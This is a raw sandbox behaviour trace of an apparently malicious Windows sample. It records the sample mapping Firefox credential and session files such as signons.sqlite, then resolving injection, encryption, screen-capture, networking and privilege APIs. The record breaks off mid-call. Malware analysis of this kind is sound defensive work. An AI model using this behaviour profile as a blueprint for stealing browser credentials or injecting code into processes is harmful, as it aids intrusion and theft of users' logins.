"\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\sessionstore.bak" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\sessionstore.bak") Region: id = 5161 start_va = 0x24c0000 end_va = 0x250ffff entry_point = 0x24c0000 region_type = mapped_file name = "signons.sqlite" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\signons.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\signons.sqlite") Region: id = 5162 start_va = 0x450000 end_va = 0x450fff entry_point = 0x450000 region_type = mapped_file name = "times.json" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\times.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\times.json") Region: id = 5163 start_va = 0x450000 end_va = 0x467fff entry_point = 0x450000 region_type = mapped_file name = "webappsstore.sqlite" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webappsstore.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\webappsstore.sqlite") Region: id = 5164 start_va = 0x450000 end_va = 0x450fff entry_point = 0x450000 region_type = mapped_file name = "profiles.ini" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles.ini") Region: id = 5165 start_va = 0x450000 end_va = 0x450fff entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 5166 start_va = 0x3800000 end_va = 0x39fffff entry_point = 0x0 region_type = private name = "private_0x0000000003800000" filename = "" Region: id = 5167 start_va = 0x3a00000 end_va = 0x3a7ffff entry_point = 0x0 region_type = private name = "private_0x0000000003a00000" filename = "" Region: id = 5168 start_va = 0x3a80000 end_va = 0x3b00fff entry_point = 0x0 region_type = private name = "private_0x0000000003a80000" filename = "" Region: id = 5169 start_va = 0x450000 end_va = 0x453fff entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 5170 start_va = 0x3a00000 end_va = 0x3b9ffff entry_point = 0x0 region_type = private name = "private_0x0000000003a00000" filename = "" Region: id = 5171 start_va = 0x450000 end_va = 0x450fff entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 5172 start_va = 0x460000 end_va = 0x464fff entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 5173 start_va = 0x450000 end_va = 0x450fff entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 5174 start_va = 0x460000 end_va = 0x464fff entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 5187 start_va = 0x2b10000 end_va = 0x2b4ffff entry_point = 0x0 region_type = private name = "private_0x0000000002b10000" filename = "" Region: id = 5188 start_va = 0x3a50000 end_va = 0x3a8ffff entry_point = 0x0 region_type = private name = "private_0x0000000003a50000" filename = "" Region: id = 5189 start_va = 0x7ef98000 end_va = 0x7ef9afff entry_point = 0x0 region_type = private name = "private_0x000000007ef98000" filename = "" Region: id = 5190 start_va = 0x450000 end_va = 0x45afff entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 5192 start_va = 0x3a90000 end_va = 0x3c8ffff entry_point = 0x0 region_type = private name = "private_0x0000000003a90000" filename = "" Region: id = 5193 start_va = 0x3c90000 end_va = 0x408ffff entry_point = 0x0 region_type = private name = "private_0x0000000003c90000" filename = "" Region: id = 5194 start_va = 0x450000 end_va = 0x45afff entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 5196 start_va = 0x4090000 end_va = 0x4151fff entry_point = 0x0 region_type = private name = "private_0x0000000004090000" filename = "" Region: id = 5197 start_va = 0x4160000 end_va = 0x4221fff entry_point = 0x0 region_type = private name = "private_0x0000000004160000" filename = "" Region: id = 5198 start_va = 0x450000 end_va = 0x45afff entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 5200 start_va = 0x4090000 end_va = 0x4154fff entry_point = 0x0 region_type = private name = "private_0x0000000004090000" filename = "" Region: id = 5201 start_va = 0x4160000 end_va = 0x4224fff entry_point = 0x0 region_type = private name = "private_0x0000000004160000" filename = "" Region: id = 5202 start_va = 0x450000 end_va = 0x45afff entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 5204 start_va = 0x450000 end_va = 0x45afff entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 5206 start_va = 0x450000 end_va = 0x45afff entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 5208 start_va = 0x450000 end_va = 0x45afff entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 5210 start_va = 0x450000 end_va = 0x45afff entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 5212 start_va = 0x450000 end_va = 0x45afff entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 5214 start_va = 0x450000 end_va = 0x45afff entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 5216 start_va = 0x450000 end_va = 0x45afff entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Thread: id = 349 os_tid = 0x6fc Thread: id = 350 os_tid = 0x538 [0458.084] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0458.084] GetProcAddress (hModule=0x759c0000, lpProcName="TerminateThread") returned 0x759d7a2f [0458.084] GetProcAddress (hModule=0x759c0000, lpProcName="LoadLibraryA") returned 0x759d49d7 [0458.084] GetProcAddress (hModule=0x759c0000, lpProcName="DeleteFileW") returned 0x759d89b3 [0458.084] GetProcAddress (hModule=0x759c0000, lpProcName="HeapReAlloc") returned 0x77cf1f6e [0458.085] GetProcAddress (hModule=0x759c0000, lpProcName="GetNativeSystemInfo") returned 0x759e10b5 [0458.085] GetProcAddress (hModule=0x759c0000, lpProcName="CreateThread") returned 0x759d34d5 [0458.085] GetProcAddress (hModule=0x759c0000, lpProcName="HeapAlloc") returned 0x77cde026 [0458.085] GetProcAddress (hModule=0x759c0000, lpProcName="HeapDestroy") returned 0x759d35b7 [0458.085] GetProcAddress (hModule=0x759c0000, lpProcName="VirtualAllocEx") returned 0x759ed9b0 [0458.085] GetProcAddress (hModule=0x759c0000, lpProcName="LocalFree") returned 0x759d2d3c [0458.085] GetProcAddress (hModule=0x759c0000, lpProcName="DeleteCriticalSection") returned 0x77ce45f5 [0458.085] GetProcAddress (hModule=0x759c0000, lpProcName="GetComputerNameW") returned 0x759ddd0e [0458.085] GetProcAddress (hModule=0x759c0000, lpProcName="GetProcessHeap") returned 0x759d14e9 [0458.085] GetProcAddress (hModule=0x759c0000, lpProcName="SystemTimeToFileTime") returned 0x759d5a7e [0458.085] GetProcAddress (hModule=0x759c0000, lpProcName="GlobalMemoryStatusEx") returned 0x759fd4c4 [0458.085] GetProcAddress (hModule=0x759c0000, lpProcName="CreateProcessW") returned 0x759d103d [0458.085] GetProcAddress (hModule=0x759c0000, lpProcName="WideCharToMultiByte") returned 0x759d170d [0458.085] GetProcAddress (hModule=0x759c0000, lpProcName="InterlockedIncrement") returned 0x759d1400 [0458.085] GetProcAddress (hModule=0x759c0000, lpProcName="GetSystemTime") returned 0x759d5a96 [0458.085] GetProcAddress (hModule=0x759c0000, lpProcName="VirtualFreeEx") returned 0x759ed9c8 [0458.085] GetProcAddress (hModule=0x759c0000, lpProcName="IsBadReadPtr") returned 0x759fd075 [0458.086] GetProcAddress (hModule=0x759c0000, lpProcName="lstrcmpiW") returned 0x759ed5cd [0458.086] GetProcAddress (hModule=0x759c0000, lpProcName="OpenMutexW") returned 0x759d5151 [0458.086] GetProcAddress (hModule=0x759c0000, lpProcName="SetEndOfFile") returned 0x759ece2e [0458.086] GetProcAddress (hModule=0x759c0000, lpProcName="GetCurrentThread") returned 0x759d17ec [0458.086] GetProcAddress (hModule=0x759c0000, lpProcName="FlushFileBuffers") returned 0x759d469b [0458.086] GetProcAddress (hModule=0x759c0000, lpProcName="RemoveVectoredExceptionHandler") returned 0x77d25f41 [0458.086] GetProcAddress (hModule=0x759c0000, lpProcName="GetCurrentProcess") returned 0x759d1809 [0458.086] GetProcAddress (hModule=0x759c0000, lpProcName="SetErrorMode") returned 0x759d1b00 [0458.086] GetProcAddress (hModule=0x759c0000, lpProcName="GetVersionExW") returned 0x759d1ae5 [0458.086] GetProcAddress (hModule=0x759c0000, lpProcName="DuplicateHandle") returned 0x759d1886 [0458.086] GetProcAddress (hModule=0x759c0000, lpProcName="GetModuleHandleA") returned 0x759d1245 [0458.086] GetProcAddress (hModule=0x759c0000, lpProcName="AddVectoredExceptionHandler") returned 0x77d2742b [0458.086] GetProcAddress (hModule=0x759c0000, lpProcName="ExitProcess") returned 0x759d7a10 [0458.086] GetProcAddress (hModule=0x759c0000, lpProcName="GetCurrentProcessId") returned 0x759d11f8 [0458.086] GetProcAddress (hModule=0x759c0000, lpProcName="CopyFileW") returned 0x759f830d [0458.086] GetProcAddress (hModule=0x759c0000, lpProcName="lstrcmpiA") returned 0x759d3e8e [0458.086] GetProcAddress (hModule=0x759c0000, lpProcName="IsWow64Process") returned 0x759d195e [0458.086] GetProcAddress (hModule=0x759c0000, lpProcName="FindFirstChangeNotificationW") returned 0x759ed851 [0458.086] GetProcAddress (hModule=0x759c0000, lpProcName="FindNextChangeNotification") returned 0x759f5c1e [0458.087] GetProcAddress (hModule=0x759c0000, lpProcName="IsProcessInJob") returned 0x759fc7ea [0458.087] GetProcAddress (hModule=0x759c0000, lpProcName="CreateRemoteThread") returned 0x75a5416b [0458.087] GetProcAddress (hModule=0x759c0000, lpProcName="CreateNamedPipeW") returned 0x75a5414b [0458.087] GetProcAddress (hModule=0x759c0000, lpProcName="DisconnectNamedPipe") returned 0x75a541df [0458.087] GetProcAddress (hModule=0x759c0000, lpProcName="ConnectNamedPipe") returned 0x75a540fb [0458.087] GetProcAddress (hModule=0x759c0000, lpProcName="GetLogicalDrives") returned 0x759d5371 [0458.087] GetProcAddress (hModule=0x759c0000, lpProcName="GetDriveTypeW") returned 0x759d418b [0458.087] GetProcAddress (hModule=0x759c0000, lpProcName="GetUserDefaultUILanguage") returned 0x759d44ab [0458.087] GetProcAddress (hModule=0x759c0000, lpProcName="CopyFileExW") returned 0x759f3b92 [0458.087] GetProcAddress (hModule=0x759c0000, lpProcName="GetEnvironmentVariableW") returned 0x759d1b48 [0458.087] GetProcAddress (hModule=0x759c0000, lpProcName="SetFilePointer") returned 0x759d17d1 [0458.087] GetProcAddress (hModule=0x759c0000, lpProcName="InitializeCriticalSection") returned 0x77ce2c42 [0458.087] GetProcAddress (hModule=0x759c0000, lpProcName="GetTimeZoneInformation") returned 0x759d465a [0458.087] GetProcAddress (hModule=0x759c0000, lpProcName="MultiByteToWideChar") returned 0x759d192e [0458.087] GetProcAddress (hModule=0x759c0000, lpProcName="SetFileAttributesW") returned 0x759ed4f7 [0458.087] GetProcAddress (hModule=0x759c0000, lpProcName="GetVolumeNameForVolumeMountPointW") returned 0x759e052f [0458.087] GetProcAddress (hModule=0x759c0000, lpProcName="OpenProcess") returned 0x759d1986 [0458.087] GetProcAddress (hModule=0x759c0000, lpProcName="GetFileTime") returned 0x759d4407 [0458.087] GetProcAddress (hModule=0x759c0000, lpProcName="ReleaseMutex") returned 0x759d111e [0458.088] GetProcAddress (hModule=0x759c0000, lpProcName="LeaveCriticalSection") returned 0x77cd2270 [0458.088] GetProcAddress (hModule=0x759c0000, lpProcName="GetModuleFileNameW") returned 0x759d4950 [0458.088] GetProcAddress (hModule=0x759c0000, lpProcName="SetFileTime") returned 0x759eecbb [0458.088] GetProcAddress (hModule=0x759c0000, lpProcName="RemoveDirectoryW") returned 0x75a544cf [0458.088] GetProcAddress (hModule=0x759c0000, lpProcName="VirtualAlloc") returned 0x759d1856 [0458.088] GetProcAddress (hModule=0x759c0000, lpProcName="ExpandEnvironmentStringsW") returned 0x759d4173 [0458.088] GetProcAddress (hModule=0x759c0000, lpProcName="WriteFile") returned 0x759d1282 [0458.088] GetProcAddress (hModule=0x759c0000, lpProcName="FindNextFileW") returned 0x759d54ee [0458.088] GetProcAddress (hModule=0x759c0000, lpProcName="EnterCriticalSection") returned 0x77cd22b0 [0458.088] GetProcAddress (hModule=0x759c0000, lpProcName="GetFileAttributesW") returned 0x759d1b18 [0458.088] GetProcAddress (hModule=0x759c0000, lpProcName="FindClose") returned 0x759d4442 [0458.088] GetProcAddress (hModule=0x759c0000, lpProcName="OpenEventW") returned 0x759d15d6 [0458.088] GetProcAddress (hModule=0x759c0000, lpProcName="GetTempPathW") returned 0x759ed4dc [0458.088] GetProcAddress (hModule=0x759c0000, lpProcName="SetLastError") returned 0x759d11a9 [0458.088] GetProcAddress (hModule=0x759c0000, lpProcName="HeapFree") returned 0x759d14c9 [0458.088] GetProcAddress (hModule=0x759c0000, lpProcName="HeapCreate") returned 0x759d4a2d [0458.088] GetProcAddress (hModule=0x759c0000, lpProcName="WriteProcessMemory") returned 0x759ed9e0 [0458.088] GetProcAddress (hModule=0x759c0000, lpProcName="GetFileSizeEx") returned 0x759d59e2 [0458.088] GetProcAddress (hModule=0x759c0000, lpProcName="FindFirstFileW") returned 0x759d4435 [0458.088] GetProcAddress (hModule=0x759c0000, lpProcName="InterlockedExchange") returned 0x759d1462 [0458.089] GetProcAddress (hModule=0x759c0000, lpProcName="GetVolumeInformationW") returned 0x759ec860 [0458.089] GetProcAddress (hModule=0x759c0000, lpProcName="ReadFile") returned 0x759d3ed3 [0458.089] GetProcAddress (hModule=0x759c0000, lpProcName="CreateDirectoryW") returned 0x759d4259 [0458.089] GetProcAddress (hModule=0x759c0000, lpProcName="FreeLibrary") returned 0x759d34c8 [0458.089] GetProcAddress (hModule=0x759c0000, lpProcName="GetModuleHandleW") returned 0x759d34b0 [0458.089] GetProcAddress (hModule=0x759c0000, lpProcName="GetProcAddress") returned 0x759d1222 [0458.089] GetProcAddress (hModule=0x759c0000, lpProcName="LoadLibraryW") returned 0x759d492b [0458.089] GetProcAddress (hModule=0x759c0000, lpProcName="Process32FirstW") returned 0x759f8baf [0458.089] GetProcAddress (hModule=0x759c0000, lpProcName="Process32NextW") returned 0x759f896c [0458.089] GetProcAddress (hModule=0x759c0000, lpProcName="GetLastError") returned 0x759d11c0 [0458.089] GetProcAddress (hModule=0x759c0000, lpProcName="CreateToolhelp32Snapshot") returned 0x759f735f [0458.089] GetProcAddress (hModule=0x759c0000, lpProcName="CreateFileW") returned 0x759d3f5c [0458.089] GetProcAddress (hModule=0x759c0000, lpProcName="CreateMutexW") returned 0x759d424c [0458.089] GetProcAddress (hModule=0x759c0000, lpProcName="ResetEvent") returned 0x759d16dd [0458.089] GetProcAddress (hModule=0x759c0000, lpProcName="CloseHandle") returned 0x759d1410 [0458.089] GetProcAddress (hModule=0x759c0000, lpProcName="SetEvent") returned 0x759d16c5 [0458.089] GetProcAddress (hModule=0x759c0000, lpProcName="Sleep") returned 0x759d10ff [0458.089] GetProcAddress (hModule=0x759c0000, lpProcName="CreateEventW") returned 0x759d183e [0458.089] GetProcAddress (hModule=0x759c0000, lpProcName="WaitForSingleObject") returned 0x759d1136 [0458.089] GetProcAddress (hModule=0x759c0000, lpProcName="WaitForMultipleObjects") returned 0x759d4220 [0458.089] GetProcAddress (hModule=0x759c0000, lpProcName="GetTickCount") returned 0x759d110c [0458.089] GetProcAddress (hModule=0x759c0000, lpProcName="VirtualFree") returned 0x759d186e [0458.090] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x758c0000 [0458.099] GetProcAddress (hModule=0x758c0000, lpProcName="GetIconInfo") returned 0x758e49ea [0458.099] GetProcAddress (hModule=0x758c0000, lpProcName="DrawIcon") returned 0x758e8deb [0458.099] GetProcAddress (hModule=0x758c0000, lpProcName="LoadImageW") returned 0x758dfbd1 [0458.100] GetProcAddress (hModule=0x758c0000, lpProcName="GetCursorPos") returned 0x758e1218 [0458.100] GetProcAddress (hModule=0x758c0000, lpProcName="DefWindowProcW") returned 0x77ce25dd [0458.100] GetProcAddress (hModule=0x758c0000, lpProcName="CreateWindowExW") returned 0x758d8a29 [0458.100] GetProcAddress (hModule=0x758c0000, lpProcName="UnregisterClassW") returned 0x758d9f84 [0458.100] GetProcAddress (hModule=0x758c0000, lpProcName="GetKeyboardLayoutList") returned 0x758e2e69 [0458.100] GetProcAddress (hModule=0x758c0000, lpProcName="CharLowerA") returned 0x758e3e75 [0458.100] GetProcAddress (hModule=0x758c0000, lpProcName="CharToOemW") returned 0x75931a26 [0458.100] GetProcAddress (hModule=0x758c0000, lpProcName="TranslateMessage") returned 0x758d7809 [0458.100] GetProcAddress (hModule=0x758c0000, lpProcName="PeekMessageW") returned 0x758e05ba [0458.100] GetProcAddress (hModule=0x758c0000, lpProcName="DispatchMessageW") returned 0x758d787b [0458.100] GetProcAddress (hModule=0x758c0000, lpProcName="MsgWaitForMultipleObjects") returned 0x758e0b4a [0458.100] GetProcAddress (hModule=0x758c0000, lpProcName="RegisterClassExW") returned 0x758db17d [0458.100] GetProcAddress (hModule=0x758c0000, lpProcName="SetWindowLongA") returned 0x758e6110 [0458.100] GetProcAddress (hModule=0x758c0000, lpProcName="GetWindowLongA") returned 0x758dd156 [0458.100] GetProcAddress (hModule=0x758c0000, lpProcName="CharUpperW") returned 0x758df350 [0458.100] GetProcAddress (hModule=0x758c0000, lpProcName="DestroyWindow") returned 0x758d9a55 [0458.100] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x76240000 [0458.102] GetProcAddress (hModule=0x76240000, lpProcName="CryptImportPublicKeyInfo") returned 0x76256c0e [0458.102] GetProcAddress (hModule=0x76240000, lpProcName="CryptDecodeObjectEx") returned 0x7624d718 [0458.102] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0458.102] GetProcAddress (hModule=0x77740000, lpProcName="RegCloseKey") returned 0x7775469d [0458.103] GetProcAddress (hModule=0x77740000, lpProcName="GetAce") returned 0x777545f0 [0458.103] GetProcAddress (hModule=0x77740000, lpProcName="CryptEncrypt") returned 0x7776779b [0458.103] GetProcAddress (hModule=0x77740000, lpProcName="GetSidSubAuthorityCount") returned 0x77750e0c [0458.103] GetProcAddress (hModule=0x77740000, lpProcName="AllocateAndInitializeSid") returned 0x777540e6 [0458.103] GetProcAddress (hModule=0x77740000, lpProcName="GetSidSubAuthority") returned 0x77750e24 [0458.103] GetProcAddress (hModule=0x77740000, lpProcName="SetEntriesInAclW") returned 0x77752a66 [0458.103] GetProcAddress (hModule=0x77740000, lpProcName="RegCreateKeyExW") returned 0x777540fe [0458.103] GetProcAddress (hModule=0x77740000, lpProcName="CryptVerifySignatureW") returned 0x7774c54a [0458.103] GetProcAddress (hModule=0x77740000, lpProcName="SetNamedSecurityInfoW") returned 0x77749fe2 [0458.103] GetProcAddress (hModule=0x77740000, lpProcName="GetNamedSecurityInfoW") returned 0x7774f4fd [0458.103] GetProcAddress (hModule=0x77740000, lpProcName="CryptCreateHash") returned 0x7774df4e [0458.103] GetProcAddress (hModule=0x77740000, lpProcName="CryptHashData") returned 0x7774df36 [0458.103] GetProcAddress (hModule=0x77740000, lpProcName="SetSecurityDescriptorSacl") returned 0x77754680 [0458.103] GetProcAddress (hModule=0x77740000, lpProcName="RegSetValueExW") returned 0x777514d6 [0458.103] GetProcAddress (hModule=0x77740000, lpProcName="CryptDestroyHash") returned 0x7774df66 [0458.104] GetProcAddress (hModule=0x77740000, lpProcName="OpenProcessToken") returned 0x77754304 [0458.104] GetProcAddress (hModule=0x77740000, lpProcName="FreeSid") returned 0x7775412e [0458.104] GetProcAddress (hModule=0x77740000, lpProcName="InitializeSecurityDescriptor") returned 0x77754620 [0458.104] GetProcAddress (hModule=0x77740000, lpProcName="RegOpenKeyExW") returned 0x7775468d [0458.104] GetProcAddress (hModule=0x77740000, lpProcName="CryptImportKey") returned 0x7774c532 [0458.104] GetProcAddress (hModule=0x77740000, lpProcName="ConvertStringSecurityDescriptorToSecurityDescriptorW") returned 0x77751f59 [0458.104] GetProcAddress (hModule=0x77740000, lpProcName="OpenThreadToken") returned 0x7775432c [0458.104] GetProcAddress (hModule=0x77740000, lpProcName="RegQueryValueExW") returned 0x777546ad [0458.104] GetProcAddress (hModule=0x77740000, lpProcName="CryptReleaseContext") returned 0x7774e124 [0458.104] GetProcAddress (hModule=0x77740000, lpProcName="GetTokenInformation") returned 0x7775431c [0458.104] GetProcAddress (hModule=0x77740000, lpProcName="CryptDestroyKey") returned 0x7774c51a [0458.104] GetProcAddress (hModule=0x77740000, lpProcName="AdjustTokenPrivileges") returned 0x7775418e [0458.104] GetProcAddress (hModule=0x77740000, lpProcName="SetSecurityDescriptorDacl") returned 0x7775415e [0458.104] GetProcAddress (hModule=0x77740000, lpProcName="GetSecurityDescriptorSacl") returned 0x77754608 [0458.104] GetProcAddress (hModule=0x77740000, lpProcName="LookupPrivilegeValueW") returned 0x777541b3 [0458.104] GetProcAddress (hModule=0x77740000, lpProcName="GetLengthSid") returned 0x7775413b [0458.104] GetProcAddress (hModule=0x77740000, lpProcName="RegDeleteValueW") returned 0x7774cf31 [0458.105] GetProcAddress (hModule=0x77740000, lpProcName="RegFlushKey") returned 0x7776773f [0458.105] GetProcAddress (hModule=0x77740000, lpProcName="RegNotifyChangeKeyValue") returned 0x7774e15b [0458.105] GetProcAddress (hModule=0x77740000, lpProcName="RegQueryInfoKeyW") returned 0x777546e7 [0458.105] GetProcAddress (hModule=0x77740000, lpProcName="RegEnumKeyW") returned 0x7775445b [0458.105] GetProcAddress (hModule=0x77740000, lpProcName="InitiateSystemShutdownExW") returned 0x7779db3a [0458.105] GetProcAddress (hModule=0x77740000, lpProcName="CryptAcquireContextW") returned 0x7774df14 [0458.105] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x76a70000 [0458.107] GetProcAddress (hModule=0x76a70000, lpProcName="ShellExecuteW") returned 0x76a83c71 [0458.107] GetProcAddress (hModule=0x76a70000, lpProcName="ShellExecuteExW") returned 0x76a91e46 [0458.107] GetProcAddress (hModule=0x76a70000, lpProcName="SHGetFolderPathW") returned 0x76af5708 [0458.107] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x76370000 [0458.108] GetProcAddress (hModule=0x76370000, lpProcName="PathFileExistsW") returned 0x763845bf [0458.108] GetProcAddress (hModule=0x76370000, lpProcName="PathIsURLW") returned 0x763855bf [0458.108] GetProcAddress (hModule=0x76370000, lpProcName="PathIsDirectoryEmptyW") returned 0x763acd81 [0458.108] GetProcAddress (hModule=0x76370000, lpProcName="StrCmpNIW") returned 0x76384745 [0458.108] GetProcAddress (hModule=0x76370000, lpProcName="PathRenameExtensionW") returned 0x763ad32a [0458.108] GetProcAddress (hModule=0x76370000, lpProcName="StrStrIW") returned 0x763846e9 [0458.108] GetProcAddress (hModule=0x76370000, lpProcName="PathMatchSpecW") returned 0x763886f7 [0458.108] GetProcAddress (hModule=0x76370000, lpProcName="PathCombineW") returned 0x7638c39c [0458.108] GetProcAddress (hModule=0x76370000, lpProcName="PathRemoveFileSpecW") returned 0x76383248 [0458.108] GetProcAddress (hModule=0x76370000, lpProcName="PathAddBackslashW") returned 0x7638c177 [0458.108] GetProcAddress (hModule=0x76370000, lpProcName="wvnsprintfW") returned 0x763b066c [0458.108] GetProcAddress (hModule=0x76370000, lpProcName="PathUnquoteSpacesW") returned 0x76385331 [0458.108] GetProcAddress (hModule=0x76370000, lpProcName="PathSkipRootW") returned 0x7639fbf5 [0458.108] GetProcAddress (hModule=0x76370000, lpProcName="PathFindExtensionW") returned 0x7638a1b9 [0458.108] GetProcAddress (hModule=0x76370000, lpProcName="SHDeleteValueW") returned 0x7637fcca [0458.109] GetProcAddress (hModule=0x76370000, lpProcName="wvnsprintfA") returned 0x7639edfe [0458.109] GetProcAddress (hModule=0x76370000, lpProcName="PathIsDirectoryW") returned 0x7637ff07 [0458.109] GetProcAddress (hModule=0x76370000, lpProcName="PathRemoveBackslashW") returned 0x76385c62 [0458.109] GetProcAddress (hModule=0x76370000, lpProcName="UrlUnescapeA") returned 0x7639c6fb [0458.109] GetProcAddress (hModule=0x76370000, lpProcName="PathQuoteSpacesW") returned 0x763ace21 [0458.109] LoadLibraryA (lpLibFileName="PSAPI.DLL") returned 0x75ad0000 [0458.109] GetProcAddress (hModule=0x75ad0000, lpProcName="GetModuleFileNameExW") returned 0x75ad13f0 [0458.109] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x75ae0000 [0458.111] GetProcAddress (hModule=0x75ae0000, lpProcName="CLSIDFromString") returned 0x75afe599 [0458.111] GetProcAddress (hModule=0x75ae0000, lpProcName="CoInitializeEx") returned 0x75b209ad [0458.111] GetProcAddress (hModule=0x75ae0000, lpProcName="CreateStreamOnHGlobal") returned 0x75b0363b [0458.111] GetProcAddress (hModule=0x75ae0000, lpProcName="CoSetProxyBlanket") returned 0x75af5ea5 [0458.111] GetProcAddress (hModule=0x75ae0000, lpProcName="CoCreateInstance") returned 0x75b29d0b [0458.111] GetProcAddress (hModule=0x75ae0000, lpProcName="CoUninitialize") returned 0x75b286d3 [0458.111] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x76950000 [0458.111] GetProcAddress (hModule=0x76950000, lpProcName="DeleteObject") returned 0x76965689 [0458.111] GetProcAddress (hModule=0x76950000, lpProcName="GetDeviceCaps") returned 0x76964de0 [0458.111] GetProcAddress (hModule=0x76950000, lpProcName="CreateDCW") returned 0x7696e743 [0458.111] GetProcAddress (hModule=0x76950000, lpProcName="CreateCompatibleDC") returned 0x769654f4 [0458.111] GetProcAddress (hModule=0x76950000, lpProcName="SelectObject") returned 0x76964f70 [0458.111] GetProcAddress (hModule=0x76950000, lpProcName="CreateCompatibleBitmap") returned 0x76965f49 [0458.111] GetProcAddress (hModule=0x76950000, lpProcName="BitBlt") returned 0x76965ea6 [0458.112] GetProcAddress (hModule=0x76950000, lpProcName="DeleteDC") returned 0x769658b3 [0458.112] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x75f20000 [0458.114] GetProcAddress (hModule=0x75f20000, lpProcName="InternetConnectA") returned 0x75f449e9 [0458.114] GetProcAddress (hModule=0x75f20000, lpProcName="InternetReadFile") returned 0x75f3b406 [0458.115] GetProcAddress (hModule=0x75f20000, lpProcName="HttpQueryInfoA") returned 0x75f3a33e [0458.115] GetProcAddress (hModule=0x75f20000, lpProcName="InternetQueryOptionA") returned 0x75f31b56 [0458.115] GetProcAddress (hModule=0x75f20000, lpProcName="HttpOpenRequestA") returned 0x75f44c7d [0458.115] GetProcAddress (hModule=0x75f20000, lpProcName="InternetCrackUrlA") returned 0x75f2d075 [0458.115] GetProcAddress (hModule=0x75f20000, lpProcName="InternetSetOptionA") returned 0x75f375e8 [0458.115] GetProcAddress (hModule=0x75f20000, lpProcName="InternetOpenA") returned 0x75f4f18e [0458.115] GetProcAddress (hModule=0x75f20000, lpProcName="InternetCloseHandle") returned 0x75f3ab49 [0458.115] GetProcAddress (hModule=0x75f20000, lpProcName="HttpSendRequestA") returned 0x75fb18f8 [0458.115] LoadLibraryA (lpLibFileName="urlmon.dll") returned 0x76690000 [0458.115] GetProcAddress (hModule=0x76690000, lpProcName="ObtainUserAgentString") returned 0x766c1d76 [0458.115] LoadLibraryA (lpLibFileName="OLEAUT32.dll") returned 0x761b0000 [0458.115] GetProcAddress (hModule=0x761b0000, lpProcName=0x9) returned 0x761b3eae [0458.115] LoadLibraryA (lpLibFileName="Secur32.dll") returned 0x75690000 [0458.116] GetProcAddress (hModule=0x75690000, lpProcName="GetUserNameExW") returned 0x7582a415 [0458.116] GetCurrentProcessId () returned 0x638 [0458.117] CryptAcquireContextW (in: phProv=0x87e5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x87e5c*=0x55e630) returned 1 [0458.126] RtlAddVectoredExceptionHandler (FirstHandler=0x1, VectoredHandler=0x784e9) returned 0x55e250 [0458.126] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x877f0, dwRevision=0x1 | out: pSecurityDescriptor=0x877f0) returned 1 [0458.126] SetSecurityDescriptorDacl (in: pSecurityDescriptor=0x877f0, bDaclPresent=1, pDacl=0x0, bDaclDefaulted=0 | out: pSecurityDescriptor=0x877f0) returned 1 [0458.127] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0458.129] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0x55a500, lpbSaclPresent=0x1cf0f8, pSacl=0x1cf100, lpbSaclDefaulted=0x1cf0fc | out: lpbSaclPresent=0x1cf0f8, pSacl=0x1cf100, lpbSaclDefaulted=0x1cf0fc) returned 1 [0458.129] SetSecurityDescriptorSacl (in: pSecurityDescriptor=0x877f0, bSaclPresent=1, pSacl=0x55a514, bSaclDefaulted=0 | out: pSecurityDescriptor=0x877f0) returned 1 [0458.129] GetVersionExW (in: lpVersionInformation=0x1cefec*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x77ce3472, dwMinorVersion=0x0, dwBuildNumber=0x561570, dwPlatformId=0x0, szCSDVersion="ⴼ疝ⴼ疝") | out: lpVersionInformation=0x1cefec*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, 